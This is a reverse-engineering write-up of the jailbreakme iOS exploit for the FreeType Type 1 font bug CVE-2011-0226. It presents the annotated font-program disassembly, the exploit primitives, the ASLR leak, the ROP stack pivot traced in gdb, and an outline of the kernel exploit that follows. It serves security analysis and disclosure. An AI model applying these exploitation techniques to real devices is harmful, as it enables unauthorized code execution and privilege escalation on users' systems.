The vulnerability (CVE-2011-0226) is located in the interpreter for Type 1 font programs. Vector font formats like Adobe Type 1 use small interpreted programs to render character outlines at different sizes. In FreeType, the t1_decoder_parse_charstrings function is responsible for executing such programs (called charstrings).

To start our analysis, we need to extract the font from the jailbreakme PDF file. We can do this using Origami :

require "origami"
include Origami

pdf = PDF.read("iPhone_4.3.3_8J2.pdf")
data = pdf.get_object(12).data
File.open("jbmev3_t1font.bin", "wb") {|f| f.write(data) }

I could not get t1disasm to work on the charstrings contained in the font, so I wrote a minimal Python script to disassemble Type 1 opcodes. The Type 1 specification is available on Adobe's website. It is not necessary to understand everything about fonts and font programs; we just need to figure out the primitives used in the exploit and their effects on the interpreter state. The main structure used by the interpreter is T1_DecoderRec, defined in include/freetype/internal/psaux.h :

//sizeof T1_DecoderRec = 0x5dc
typedef struct  T1_DecoderRec_
{
        T1_BuilderRec        builder;

        //offsetof stack = 0x70
        //T1_MAX_CHARSTRINGS_OPERANDS = 256
        FT_Long              stack[T1_MAX_CHARSTRINGS_OPERANDS];

        //offsetof top = 0x470
        FT_Long*             top;//stack pointer

        //offsetof zones = 0x474
        T1_Decoder_ZoneRec   zones[T1_MAX_SUBRS_CALLS + 1];
        {
                FT_Byte*  cursor;
                FT_Byte*  base;
                FT_Byte*  limit;
        }

        T1_Decoder_Zone      zone;//current zone

        FT_Service_PsCMaps   psnames;
        FT_UInt              num_glyphs;
        FT_Byte**            glyph_names;

        FT_Int               lenIV;
        FT_UInt              num_subrs;
        //offsetof subrs = 0x558
        FT_Byte**            subrs;
        FT_PtrDist*          subrs_len;

        FT_Matrix            font_matrix;
        FT_Vector            font_offset;

        FT_Int               flex_state;
        FT_Int               num_flex_vectors;
        FT_Vector            flex_vectors[7];

        PS_Blend             blend;
        //offsetof hint_mode = 0x5BC
        FT_Render_Mode       hint_mode;

        //offsetof parse_callback = 0x5c0
        T1_Decoder_Callback  parse_callback;
        //offsetof funcs = 0x5c4
        T1_Decoder_FuncsRec  funcs;
        {
                FT_Error (*init)( T1_Decoder           decoder,
                                 FT_Face              face,
                                 FT_Size              size,
                                 FT_GlyphSlot         slot,
                                 FT_Byte**            glyph_names,
                                 PS_Blend             blend,
                                 FT_Bool              hinting,
                                 FT_Render_Mode       hint_mode,
                                 T1_Decoder_Callback  callback );

                void (*done)( T1_Decoder  decoder );

                FT_Error (*parse_charstrings)( T1_Decoder  decoder,
                                                          FT_Byte*    base,
                                                          FT_UInt     len );
        }

        //offsetof buildchar = 0x5d0
        FT_Long*             buildchar;
        //offsetof len_buildchar = 0x5d4
        FT_UInt              len_buildchar;
        //offsetof seac = 0x5d8
        FT_Bool              seac;

} T1_DecoderRec;
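The offsets annotated in the structure can be cross-checked with a few lines of Python. This is only a sketch under stated assumptions: a 32-bit target where pointers, FT_Long, FT_Int and enums are all 4 bytes, sizeof(T1_BuilderRec) = 0x70 (taken from the stack offset above), and T1_MAX_SUBRS_CALLS = 16 (a value inferred here so that the computed offsets agree with the annotations; it is not stated in the listing).

```python
# Recompute T1_DecoderRec field offsets for a 32-bit target.
# Assumptions (not from the listing): 4-byte pointers/longs/ints/enums,
# sizeof(T1_BuilderRec) == 0x70, T1_MAX_SUBRS_CALLS == 16.
T1_MAX_CHARSTRINGS_OPERANDS = 256
T1_MAX_SUBRS_CALLS = 16  # assumed value

FIELDS = [                      # (name, size in bytes)
    ("builder", 0x70),
    ("stack", 4 * T1_MAX_CHARSTRINGS_OPERANDS),
    ("top", 4),
    ("zones", 12 * (T1_MAX_SUBRS_CALLS + 1)),   # 3 pointers per zone
    ("zone", 4),
    ("psnames", 4),
    ("num_glyphs", 4),
    ("glyph_names", 4),
    ("lenIV", 4),
    ("num_subrs", 4),
    ("subrs", 4),
    ("subrs_len", 4),
    ("font_matrix", 16),        # 4 fixed-point values
    ("font_offset", 8),         # 2 coordinates
    ("flex_state", 4),
    ("num_flex_vectors", 4),
    ("flex_vectors", 8 * 7),
    ("blend", 4),
    ("hint_mode", 4),
    ("parse_callback", 4),
    ("funcs", 12),              # init, done, parse_charstrings
    ("buildchar", 4),
    ("len_buildchar", 4),
    ("seac", 4),                # FT_Bool plus trailing padding
]

def layout(fields):
    """Return ({name: offset}, total_size) for consecutively packed fields."""
    offsets, cursor = {}, 0
    for name, size in fields:
        offsets[name] = cursor
        cursor += size
    return offsets, cursor

OFFSETS, SIZE = layout(FIELDS)
for name in ("stack", "top", "zones", "subrs", "hint_mode",
             "parse_callback", "funcs", "buildchar", "len_buildchar", "seac"):
    print(f"{name:15s} 0x{OFFSETS[name]:03x}")
print(f"sizeof          0x{SIZE:03x}")
```

With these assumptions every computed offset lands on the annotated value, which is a reasonable sanity check that the operand stack and the function pointers near the end of the structure are only a few hundred dwords apart.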

The main memory locations available to a legitimate font program and used by the exploit are :

  • the operand/result stack (decoder->stack). This stack grows "up".
  • two variables : x and y (local variables in t1_decoder_parse_charstrings)
  • the decoder->buildchar array

The buildchar array is actually defined and initialized (all zeroes) by the /BuildCharArray command in the font. Its size is set to 0x30000.

The vulnerable code and the main idea behind comex's exploit were mentioned by windknown on Twitter : a missing check on the arg_cnt parameter of the callothersubr operation allows a malicious font program to move the interpreter stack pointer out of bounds, providing read and write access to various fields of the T1_DecoderRec structure (and to the "real" stack, since this structure is a local variable of the T1_Load_Glyph function).
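The effect of the missing check can be illustrated with a toy model. This is a sketch, not FreeType's code: it assumes the vulnerable interpreter only compares arg_cnt against the current stack depth (an upper bound), and the patched flag stands for a hypothetical fix that also rejects negative counts. The operand values are the ones used by the /at program disassembled further down.

```python
# Toy model of the operand popping done for callothersubr.
# 'top' is an index into the operand stack (in dwords), not a real pointer.
STACK_SIZE = 256  # T1_MAX_CHARSTRINGS_OPERANDS

def fix2int(value):
    """Convert a 16.16 fixed-point value stored in 32 bits to a signed int."""
    value &= 0xFFFFFFFF
    if value & 0x80000000:
        value -= 1 << 32
    return value >> 16

def pop_othersubr_args(stack, top, patched=False):
    """Pop the subroutine number and argument count, then drop the arguments.

    Returns (subr_no, arg_cnt, new_top). The unpatched guard is an assumption
    about the vulnerable code; the patched guard is a hypothetical fix.
    """
    top -= 2
    arg_cnt = fix2int(stack[top])
    subr_no = fix2int(stack[top + 1])
    if patched and arg_cnt < 0:
        raise ValueError("negative argument count")
    if arg_cnt > top:                 # only an upper bound is enforced
        raise ValueError("stack underflow")
    return subr_no, arg_cnt, top - arg_cnt

stack = [0] * STACK_SIZE
stack[0] = 0xFEA50000   # -347 in 16.16
stack[1] = 42 << 16     # othersubr #42
subr_no, arg_cnt, new_top = pop_othersubr_args(stack, top=2)
print(subr_no, arg_cnt, new_top, new_top >= STACK_SIZE)
```

In this model, "popping" a negative number of arguments moves the stack index forward instead of backward, so it ends up past the 256 operand slots.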

The jailbreakme font program uses this vulnerability to read the decoder->parse_callback field (and a few others), construct a ROP payload in the decoder->buildchar array, and execute this payload by overwriting decoder->parse_callback and triggering a call to this function pointer. The following primitives are used to program the interpreter (the "weird machine") :

  • push instructions : write a constant value on the interpreter stack. The stack pointer is checked before use.
  • op_setcurrentpoint : read 2 dwords from the stack into variables x and y. This operation does not check the stack pointer.
  • callothersubr #00 : write the x and y variables on the stack. This operation does not check the stack pointer but has preconditions : decoder->flex_state != 0 && decoder->num_flex_vectors == 7. The argument count for this routine is 3 but only the first 2 parameters are used (overwritten with x and y).
  • callothersubr #42 : calls an invalid subroutine with a negative argument count to bring the stack pointer beyond the stack area. This is the vulnerability that makes the exploit work.
  • op_hstem3, op_hmoveto, op_unknown15 : pop operands without checking the stack pointer, used to bring the stack pointer back down into its bounds
  • callothersubr #12 : reset the stack pointer (top = decoder->stack)
  • callothersubr #20 and #21 : add/subtract values on the stack
  • callothersubr #23 and #24 : read/write dwords in the buildchar array.

The PDF document contains a single page with the @ (at) character, using the malicious font. The /at font program is run to render this character; this is the entry point of the exploit. Ten subroutines are also defined in the font and used by the /at font program :

  • subroutine 0 : "fake" subroutine, contains a zlib-compressed Mach-O binary that is dropped in /tmp/locutus and run by the ROP payload once the kernel exploit is done
  • subroutine 1 : empty (op_return)
  • subroutine 2 : exit interpreter (op_endchar)
  • subroutine 3 : calls callothersubr #01 to set decoder->flex_state=1 and executes callothersubr #02 seven times to set decoder->num_flex_vectors=7 : this routine sets the preconditions for the "write variables to stack unchecked" primitive (callothersubr #00)

Subroutines 4 to 7 are the primitives for the ROP payload construction :

  • subroutine 4 : write dword, increments index
    • subr4(param) => buildchar[buildchar[3]++] = param
  • subroutine 5 : write gadget/function address with ASLR offset (shared cache slide)
    • subr5(param) => subr4(param + buildchar[1]) = subr4(param + shared_cache_slide)
  • subroutine 6 : write dword + stack offset (used to get subroutine 0 address and restore the stack pointer once the ROP payload is done)
    • subr6(param) => subr4(param + buildchar[0]) = subr4(param + &decoder->zones[0])
  • subroutine 7 : write dword + buildchar array base (for "local" variables used by the ROP payload)
    • subr7(param) => subr4(param + buildchar[2]) = subr4(param + &buildchar[0])
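The four write primitives above can be modelled in a few lines of Python. This is a toy model of the semantics listed above, not a translation of the charstring code; the addresses and the slide used in the example are hypothetical values chosen only for illustration.

```python
MASK = 0xFFFFFFFF

class BuildChar:
    """Toy model of decoder->buildchar as used by subroutines 4 to 7."""

    def __init__(self, zones_addr, slide, base_addr,
                 start_index=0x7918, length=0x30000):
        self.cells = [0] * length
        self.cells[0] = zones_addr    # &decoder->zones[0]
        self.cells[1] = slide         # shared cache slide
        self.cells[2] = base_addr     # &buildchar[0]
        self.cells[3] = start_index   # next free slot of the ROP stack

    def subr4(self, value):
        """Write one dword at the current index, then increment the index."""
        index = self.cells[3]
        self.cells[index] = value & MASK
        self.cells[3] = index + 1

    def subr5(self, value):
        """Write a gadget/function address adjusted by the slide."""
        self.subr4(value + self.cells[1])

    def subr6(self, value):
        """Write an offset relative to &decoder->zones[0]."""
        self.subr4(value + self.cells[0])

    def subr7(self, value):
        """Write an offset relative to the buildchar array base."""
        self.subr4(value + self.cells[2])

# Hypothetical values, for illustration only.
bc = BuildChar(zones_addr=0x2FE00474, slide=0x1000, base_addr=0x03A00000)
bc.subr4(0x11111111)
bc.subr5(0x30000001)
bc.subr6(0x10)
bc.subr7(0x20)
print([hex(v) for v in bc.cells[0x7918:0x791C]], hex(bc.cells[3]))
```

Keeping the write index in buildchar[3] means the payload-building subroutines are a flat sequence of "push constant, callsubr" pairs with no address arithmetic of their own.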

Subroutines 8 and 9 are responsible for writing a ROP payload to the buildchar array : they contain some initialization code (described below), followed by a sequence of calls to subroutines 4, 5, 6 and 7.

Here is the annotated disassembly of the /at font program start :

--------------------------------------------------------------------------------
File: at.bin			SHA1: 49b6ea93254f9767ad8d314dd77ecb6850f18412
--------------------------------------------------------------------------------
0x00000000  8e      push 0x3                 	
0x00000001  8b      push 0x0                 	
0x00000002  0c 21   op_setcurrentpoint       	; x=0x3; y=0x0
0x00000004  8e      push 0x3                 	
0x00000005  0a      callsubr #03             	; subr_enable_endflex
0x00000006  fb ef   push 0xfea50000          	
0x00000008  b5      push 0x2a                	
0x00000009  0c 10   callothersubr #42 nargs=-347	; top = &decoder->seac + 4
0x0000000b  0c 10   callothersubr           	; #00 (decoder->seac) nargs=3 (decoder->len_buildchar >> 16)
                                                ; endflex : top[0]=x; top[1]=y; top += 2
                                                ; decoder->funcs.done = x  = 0x30000 (0x3 << 16)
                                                ; decoder->funcs.parse_charstrings = y = 0x0
0x0000000d  16      op_hmoveto               	; top -= 1; x += top[0]
0x0000000e  16      op_hmoveto               	; top -= 1; x += top[0]
0x0000000f  16      op_hmoveto               	; top -= 1; x += top[0]
0x00000010  0c 21   op_setcurrentpoint       	; top -= 2; x=decoder->hint_mode=0; y=decoder->parse_callback
0x00000012  0c 02   op_hstem3                	; top -= 6
0x00000014  0c 02   op_hstem3                	; top -= 6
0x00000016  0c 02   op_hstem3                	; top -= 6
0x00000018  0c 02   op_hstem3                	; top -= 6
0x0000001a  0c 02   op_hstem3                	; top -= 6
0x0000001c  0c 02   op_hstem3                	; top -= 6
0x0000001e  0c 02   op_hstem3                	; top -= 6
0x00000020  0c 02   op_hstem3                	; top -= 6
0x00000022  0c 02   op_hstem3                	; top -= 6
0x00000024  0c 02   op_hstem3                	; top -= 6
0x00000026  0c 02   op_hstem3                	; top -= 6
0x00000028  0c 02   op_hstem3                	; top -= 6
0x0000002a  0c 02   op_hstem3                	; top -= 6
0x0000002c  0f      op_unknown15             	; top -= 2 (/* nothing to do except to pop the two arguments */)
0x0000002d  0f      op_unknown15             	; top -= 2 (/* nothing to do except to pop the two arguments */)
0x0000002e  16      op_hmoveto               	; top -= 1; x += decoder->zone => x = &decoder->zones[0]
0x0000002f  0c 02   op_hstem3                	; top -= 6
0x00000031  0c 02   op_hstem3                	; top -= 6
0x00000033  8e      push 0x3                 	
0x00000034  0a      callsubr #03             	; subr_enable_endflex
0x00000035  8b      push 0x0                 	
0x00000036  8b      push 0x0                 	
0x00000037  8b      push 0x0                 	
0x00000038  8e      push 0x3                 	
0x00000039  8b      push 0x0                 	
0x0000003a  0c 10   callothersubr #00 nargs=3	; endflex : top[0]=x; top[1]=y; top += 2
0x0000003c  8c      push 0x1                 	
0x0000003d  8d      push 0x2                 	
0x0000003e  a3      push 0x18                	
0x0000003f  0c 10   callothersubr #24 nargs=2	; decoder->buildchar[1] = y = decoder->parse_callback = T1_Parse_Glyph
0x00000041  8b      push 0x0                 	
0x00000042  8d      push 0x2                 	
0x00000043  a3      push 0x18                	
0x00000044  0c 10   callothersubr #24 nargs=2	; decoder->buildchar[0] = x = &decoder->zones[0]
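The script that produced this listing is not shown. As a rough idea of what such a tool involves, here is a minimal sketch of a charstring tokenizer. It is not the author's script: it assumes the charstring has already been decrypted, covers only the operators that appear above (names and number encoding follow the Adobe Type 1 specification), and prints operands as plain integers rather than in the 16.16 form shown in the listing.

```python
import struct

# Operator names from the Adobe Type 1 specification (subset).
OPS = {0x0A: "callsubr", 0x0B: "return", 0x0E: "endchar", 0x16: "hmoveto"}
ESC_OPS = {0x02: "hstem3", 0x06: "seac", 0x10: "callothersubr",
           0x11: "pop", 0x21: "setcurrentpoint"}

def disassemble(data):
    """Yield (offset, text) for each token of a decrypted charstring."""
    i = 0
    while i < len(data):
        start, b = i, data[i]
        i += 1
        if b >= 32:                          # operand
            if b <= 246:                     # one-byte integer
                value = b - 139
            elif b <= 250:                   # two-byte positive integer
                value = (b - 247) * 256 + data[i] + 108
                i += 1
            elif b <= 254:                   # two-byte negative integer
                value = -(b - 251) * 256 - data[i] - 108
                i += 1
            else:                            # 255: 32-bit signed big-endian
                value = struct.unpack(">i", data[i:i + 4])[0]
                i += 4
            yield start, f"push {value}"
        elif b == 12:                        # two-byte (escaped) operator
            yield start, ESC_OPS.get(data[i], f"op_escape_{data[i]}")
            i += 1
        else:                                # one-byte operator
            yield start, OPS.get(b, f"op_unknown{b}")

sample = bytes.fromhex("8e8b0c218e0afbefb50c10")   # first bytes of the listing
for offset, text in disassemble(sample):
    print(f"0x{offset:08x}  {text}")
```

On these first eleven bytes the sketch yields the same offsets and operations as the listing, with fb ef decoding to -347 and b5 to 42.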

The program starts by initializing the variables x and y to the values 0x3 and 0x0. The instruction callothersubr #42 nargs=-347 exploits the bug to move the stack pointer to the end of the T1_DecoderRec structure, right after the seac field, which is set to 0 when the structure is initialized. The length of the buildchar array was set to 0x30000, which is chosen specifically to make the len_buildchar and seac fields look like the "stack frame" for the callothersubr #00 primitive (0x30000 is 0x3 encoded in the 16.16 fixed point format used by the interpreter). Hence, the following callothersubr instruction (at offset 0xb) will write the x and y values over the funcs.done and funcs.parse_charstrings fields. This overwrite is a preparatory step for the end of the font program, where the parse_callback field is overwritten using the same primitive.
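The arithmetic behind these two callothersubr instructions can be replayed with byte offsets. The sketch below only tracks the stack pointer as an offset inside T1_DecoderRec, using the offsets annotated in the structure; the order in which the two operands are popped is an assumption that matches the annotations in the listing.

```python
# Byte offsets inside T1_DecoderRec, copied from the annotated structure.
STACK, FUNCS = 0x70, 0x5C4
LEN_BUILDCHAR, SEAC, SIZEOF = 0x5D4, 0x5D8, 0x5DC
FUNCS_DONE = FUNCS + 4                 # funcs = {init, done, parse_charstrings}
FUNCS_PARSE_CHARSTRINGS = FUNCS + 8

def to_fixed(n):
    """Encode an integer as 16.16 fixed point in an unsigned 32-bit word."""
    return (n << 16) & 0xFFFFFFFF

# Relevant fields as they are in memory when the exploit runs.
memory = {LEN_BUILDCHAR: 0x30000, SEAC: 0}

# First callothersubr: operands -347 and 42 sit in stack[0] and stack[1].
top = STACK + 2 * 4
top -= 2 * 4                 # pop subroutine number and argument count
top -= -347 * 4              # "pop" -347 arguments: top moves up
assert top == SIZEOF == SEAC + 4

# Second callothersubr: its two operands are now len_buildchar and seac.
top -= 2 * 4
arg_cnt = memory[top] >> 16          # len_buildchar read as argument count
subr_no = memory[top + 4] >> 16      # seac read as subroutine number
top -= arg_cnt * 4

# othersubr #00 then stores x at top[0] and y at top[1].
written = {top: 0x30000, top + 4: 0x0}
print(hex(to_fixed(-347)), arg_cnt, subr_no, hex(top))
```

The final offset is 0x5c8, which is funcs.done, so x and y land on funcs.done and funcs.parse_charstrings as described.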

The stack pointer is then decremented by 3 op_hmoveto instructions to point to the funcs field (right after the parse_callback field). The following op_setcurrentpoint operation reads the hint_mode and parse_callback fields into the x and y variables. The stack pointer is then decremented back into the stack area to allow the next instructions to run without errors. In the process, the value of the zone field (which points to zones[0]) is also read into the x variable by the op_hmoveto instruction at offset 0x2e (it is added to the hint_mode value, which is 0). The x and y variables are then pushed onto the stack (using subroutine #03 to enable callothersubr #00), and stored in buildchar[0] and buildchar[1]. The next sequence, starting at offset 0x46 with callothersubr #42 nargs=-151, follows the same pattern : it reads the decoder->buildchar pointer and stores it in buildchar[2].

Next, the value 0x7918 is written to buildchar[3] : this will be used as the index for the ROP payload building routine. This leaves 0x7918 * 4 bytes for the stack frames of functions called by the ROP payload.

Another value is also leaked using callothersubr #42 nargs=-152 and stored in buildchar[4] : the value of the __gxx_personality_sj0 symbol stored in the stack frame of the calling function FT::font::load_glyph. Because the User-Agent field only identifies iPhone/iPad/iPod and firmware version, but not the specific model (e.g. iPhone 3GS or iPhone 4), the font program contains multiple ROP building subroutines. The correct one is chosen by comparing the difference between __gxx_personality_sj0 and T1_Parse_Glyph. Since the two symbols are located in different shared libraries (libstdc++.6.dylib and libCGFreetype.A.dylib) and because the order of those libraries in the shared cache is different for the same firmware version on different devices (see Stefan Esser's talk at POC 2010), this delta identifies the device (thanks to comex for explaining this part).

The payload building subroutine number for the identified device is then pushed on the stack using conditional instructions (callothersubr #27). Depending on the device, subroutine 8 or 9 will be called.

The ROP building subroutine starts by subtracting the default T1_Parse_Glyph address from the one leaked in buildchar[1]. Now buildchar[1] contains the shared cache slide (see Stefan Esser's talk at HITB AMS 2011), which will be used by subroutine 5 to adjust the gadget addresses written to the ROP stack and successfully bypass ASLR. Then, the address of a gadget (scale_QT+254) is computed and placed in the y variable using op_setcurrentpoint. After that, the ROP payload is constructed dword by dword, using subroutines 4, 5, 6 and 7. Some values that cannot be encoded directly in push operations are computed using the subtract operation.
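The two address computations described above (device detection from the distance between two leaked symbols, then slide computation) boil down to 32-bit modular arithmetic. The sketch below is illustrative only: the delta constants are the ones given in the pseudocode summary further down (which itself warns that it does not match the disassembly exactly), and every address in the example is hypothetical.

```python
MASK = 0xFFFFFFFF

# Delta constants as given in the pseudocode summary of this article.
DEVICE_SUBR = {
    0xFF2AB38B: 8,   # iPhone 3GS
    0xFFF5A38B: 9,   # iPhone 4
}

def pick_rop_subr(gxx_personality, t1_parse_glyph):
    """Choose the ROP building subroutine from the distance between two symbols."""
    delta = (gxx_personality - t1_parse_glyph) & MASK
    return DEVICE_SUBR.get(delta)    # None for an unrecognized device

def cache_slide(leaked_addr, default_addr):
    """Slide = leaked runtime address minus the address at the default base."""
    return (leaked_addr - default_addr) & MASK

def rebase(default_addr, slide):
    """Adjust a default gadget address by the slide (what subroutine 5 adds)."""
    return (default_addr + slide) & MASK

# Hypothetical addresses, chosen only to exercise the functions.
leaked_parse_glyph = 0x33CDA5F1
default_parse_glyph = 0x33C005F1
leaked_gxx = (leaked_parse_glyph + 0xFF2AB38B) & MASK

slide = cache_slide(leaked_parse_glyph, default_parse_glyph)
print(pick_rop_subr(leaked_gxx, leaked_parse_glyph),
      hex(slide), hex(rebase(0x32D3AF4B, slide)))
```

Because both leaked symbols move by the same slide, their difference is independent of ASLR, which is why it can serve as a device fingerprint before the slide is even known.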

Once the ROP payload building is done, the /at routine copies the first 7 dword values from the constructed ROP stack onto the decoder stack. These 7 values will be used to perform the stack pivot to the "main" ROP stack stored in the buildchar array. The last step is to overwrite decoder->parse_callback with the contents of the y variable. It is now that the funcs.done and funcs.parse_charstrings values make sense : the callothersubr #42 nargs=-337 (at offset 0x167) brings the stack pointer to the end of the decoder->funcs structure, whose fields were modified to be 0x30000 and 0x0, so the next callothersubr instruction calls the write primitive (callothersubr #00), which overwrites the parse_callback field with the gadget address stored in the y variable.

Finally, the font program ends with the op_seac instruction, which triggers the following calls :

  • t1operator_seac (this function is actually inlined in t1_decoder_parse_charstrings)
  • t1_decoder_parse_glyph
  • decoder->parse_callback() that will initiate the stack pivot

The overall operation of the font exploit can be summarized by the following pseudocode :

at_pseudocode
{
    //required for decoder->parse_callback = y at the end
    decoder->funcs.done = 0x30000 // (0x3 << 16)
    decoder->funcs.parse_charstrings = 0x0

    //leak members of the decoder structure and store them at the start of decoder->buildchar
    y = decoder->parse_callback = T1_Parse_Glyph
    x = &decoder->zones[0]

    decoder->buildchar[1] = y = T1_Parse_Glyph
    decoder->buildchar[0] = x = &decoder->zones[0]

    y = decoder->buildchar
    decoder->buildchar[2] = y = decoder->buildchar

    y = __gxx_personality_sj0
    decoder->buildchar[3] = 0x7918

    //exit (subr 2) on ARMv6 devices, where T1_Parse_Glyph is not compiled in Thumb
    //otherwise call subr3
    //callsubr 2 + T1_Parse_Glyph % 2
    callsubr (2 + (decoder->buildchar[1] - ((decoder->buildchar[1] / 2) * 2)))

    //detect exact device
    decoder->buildchar[4] = y - decoder->buildchar[1]  = __gxx_personality_sj0 - T1_Parse_Glyph

    //this does not match the disassembly, but this is the idea
    if( decoder->buildchar[4] == 0xff2ab38b)
        rop_build_subr = 8 //iphone 3gs
    else //if( decoder->buildchar[4] == 0xfff5a38b)
        rop_build_subr = 9 //iphone 4
        
    callsubr rop_build_subr
    {
        //compute ASLR slide
        decoder->buildchar[1] -= T1_Parse_Glyph_default_addr
        y = gadget1 - decoder->buildchar[1]

        //... build rop payload with subroutines 4,5,6,7
    }

    //recopy stack pivot ROP chain
    decoder->stack[0] = buildchar[0x7918]
    decoder->stack[1] = buildchar[0x7919]
    decoder->stack[2] = buildchar[0x791a]
    decoder->stack[3] = buildchar[0x791b]
    decoder->stack[4] = buildchar[0x791c]
    decoder->stack[5] = buildchar[0x791d]
    decoder->stack[6] = buildchar[0x791e]

    decoder->parse_callback = y

    //op_seac => initiate stack pivot
    decoder->parse_callback()
}

At this point, we can attach gdb to MobileSafari and set a breakpoint in t1_decoder_parse_glyph to see the transfer to the ROP payload :

Breakpoint 1, 0x33ce83b0 in t1_decoder_parse_glyph ()
(gdb) bt
#0  0x33ce83b0 in t1_decoder_parse_glyph ()
#1  0x33ce99b0 in t1_decoder_parse_charstrings ()
#2  0x33cda63c in T1_Parse_Glyph_And_Get_Char_String ()
#3  0x33cda966 in T1_Load_Glyph ()
#4  0x33cd1b2c in FT_Load_Glyph ()
#5  0x33cc7332 in FT::font::load_glyph ()
#6  0x33cc9fce in FT::path_builder::build_path_for_glyph ()
#7  0x33cca41a in FT::path_builder::create_path_for_glyph ()
#8  0x33ccd4de in (anonymous namespace)::create_glyph_path ()
#9  0x31e9dfac in CGFontCreateGlyphPath ()
...
#58 0x329b0806 in UIApplicationMain ()
#59 0x000d01dc in ?? ()
(gdb) x/3i $pc
0x33ce83b0 <t1_decoder_parse_glyph+4>:  ldr.w   r3, [r0, #1472]
0x33ce83b4 <t1_decoder_parse_glyph+8>:  blx     r3	;return decoder->parse_callback()
0x33ce83b6 <t1_decoder_parse_glyph+10>: pop     {r7, pc}
(gdb) si 2
0x32e14f4a in scale_QT ()
(gdb) x/2i $pc
0x32e14f4a <scale_QT+254>:      add     sp, #320
0x32e14f4c <scale_QT+256>:      pop     {r4, r5, pc}
(gdb) si
0x32e14f4c in scale_QT ()
(gdb) x/8x $sp			; sp = &decoder->stack[0]
0x2fec9760:     0x00000000      0x00000000      0x305a0cbd      0x03a36478
0x2fec9770:     0x305a38fd      0x00000000      0x00000000      0xfeaf0000
(gdb) si
0x305a0cbc in TICandQualityFilter_fr::TICandQualityFilter_fr ()
(gdb) x/i $pc
0x305a0cbc <_ZN22TICandQualityFilter_frC1ERKN2KB6VectorINS0_4WordEEEPK10__CFLocale+8>:
      pop     {r7, pc}
(gdb) si
0x305a38fc in -[NoteContext copyNotesForSearch:complete:] ()
(gdb) x/2i $pc
0x305a38fc <-[NoteContext copyNotesForSearch:complete:]+20>:    sub.w   sp, r7, #0      ; 0x0
0x305a3900 <-[NoteContext copyNotesForSearch:complete:]+24>:    pop     {r7, pc}
(gdb) si
0x305a3900 in -[NoteContext copyNotesForSearch:complete:] ()
(gdb) x/32x $sp			;sp = &buildchar[0x791e]
0x3a36478:      0x00000000      0x305a0dbd      0x2fec9c48      0x00000000
0x3a36488:      0x00000000      0x00000000      0x305e343f      0x03a3679c
0x3a36498:      0x00000000      0x305c6379      0x00000000      0x32e1d613
0x3a364a8:      0x03a364c4      0x32e1d613      0x3322d8fd      0x31552538
0x3a364b8:      0x3edab084      0x03a36ec8      0x03a36ee0      0x00000000
0x3a364c8:      0x305c6379      0x03a364d8      0x305b5889      0x33841129
0x3a364d8:      0x03a364e4      0x305b5889      0x03a365e8      0x00000000
0x3a364e8:      0x32e1d613      0x03a36920      0x305a0e97      0x03a36514

We can then use the following gdb script to dump the main ROP payload and the gadgets used.

set $i=$sp
while $i < $sp+0xE00
        if *$i > 0x30000000
                x/3i *$i
        end
        if *$i < 0x30000000
                x/x $i
        end
        set $i=$i+4
end
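The same classification can be applied offline to a pasted memory dump. The sketch below is a rough Python counterpart of the gdb loop above, not a replacement for it: it cannot disassemble anything, it only flags dwords above the same 0x30000000 threshold as probable code addresses. The sample is the first two lines of the x/32x output shown earlier.

```python
DUMP = """\
0x3a36478:      0x00000000      0x305a0dbd      0x2fec9c48      0x00000000
0x3a36488:      0x00000000      0x00000000      0x305e343f      0x03a3679c
"""

def classify(dump, threshold=0x30000000):
    """Yield (address, value, kind) for each dword of an x/Nx style dump."""
    for line in dump.splitlines():
        addr_text, _, words = line.partition(":")
        addr = int(addr_text, 16)
        for n, word in enumerate(words.split()):
            value = int(word, 16)
            # Same heuristic as the gdb script: high values are likely
            # gadget or function addresses, everything else is data.
            kind = "code?" if value > threshold else "data"
            yield addr + 4 * n, value, kind

for addr, value, kind in classify(DUMP):
    print(f"0x{addr:08x}  0x{value:08x}  {kind}")
```

Note that the threshold is only a heuristic: stack addresses such as 0x2fec9c48 fall just below it and are correctly treated as data here, but the boundary depends on the memory layout of the process.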

This ROP payload exploits a kernel vulnerability in the IOMobileFramebuffer IOKit interface (CVE-2011-0227), using a kernel ROP payload that copies shellcode to address 0x80000400 (executable slack space at the beginning of the kernelcache mapping). The kernel shellcode patches various kernel functions to allow unsigned applications to run. It also installs a handler for syscall 0 whose sole purpose is to give root privileges to the calling process. This is used at the start of the main function in the locutus binary. The syscall handler is one-shot : it removes itself from the sysent array as soon as it is called (and it is not present in the untether binary since this is only required for the jailbreak installation process).

Once the kernel exploit is done, the Mach-O binary contained in subroutine 0 is decompressed into /tmp/locutus and run using the posix_spawn function. Finally, the stack pointer is restored and execution resumes at the t1_decoder_parse_charstrings epilogue. The R0 register is also set to 0x00000539 so that the font parser exits with a 1337 error code :) The locutus binary then installs Cydia and the untethered jailbreak package. A shared library is injected into the SpringBoard process (using mach calls and the thread_create_running function) to display the Cydia icon with a progress bar, just like a regular application installation.

This new version of jailbreakme is really impressive, and features the first public exploit that actively bypasses the ASLR mechanism introduced with iOS 4.3. A homebrew patch is even provided (PDF Patcher2) to avoid any controversy about "irresponsible disclosure". Hats off to comex !